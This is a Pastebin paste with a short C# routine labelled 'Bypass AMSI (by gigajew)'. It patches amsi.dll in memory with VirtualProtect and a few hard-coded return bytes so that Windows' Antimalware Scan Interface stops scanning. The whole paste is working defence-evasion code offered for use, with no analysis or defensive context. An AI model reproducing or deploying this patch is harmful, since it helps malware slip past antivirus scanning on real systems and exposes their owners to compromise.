SHARE
TWEET

Untitled

a guest Jan 27th, 2020 337 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.         private const string V = "kernel32.dll";
  2.  
  3.         [DllImport(V)]
  4.         private static extern IntPtr LoadLibrary(string lib);
  5.  
  6.         [DllImport(V)]
  7.         private static extern bool VirtualProtect(IntPtr addr, int length, int flprot, out int oldprot);
  8.  
  9.  
  10.         /// <summary>
  11.         /// Bypass AMSI (by gigajew)
  12.         /// </summary>
  13.         private static void AMSIBypass()
  14.         {
  15.             IntPtr addr = new IntPtr(LoadLibrary("amsi.dll").ToInt64() + ((IntPtr.Size * 8 == 32) ? 0x44A0:  0x23E0));
  16.             byte[] buffer = ((IntPtr.Size ==4) ? new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 } : new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 } );
  17.             if (VirtualProtect(addr, buffer.Length, 0x04, out int old))
  18.             {
  19.                 Marshal.Copy(buffer, 0, addr, buffer.Length);
  20.                 VirtualProtect(addr, buffer.Length, old, out old);
  21.             }
  22.         }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top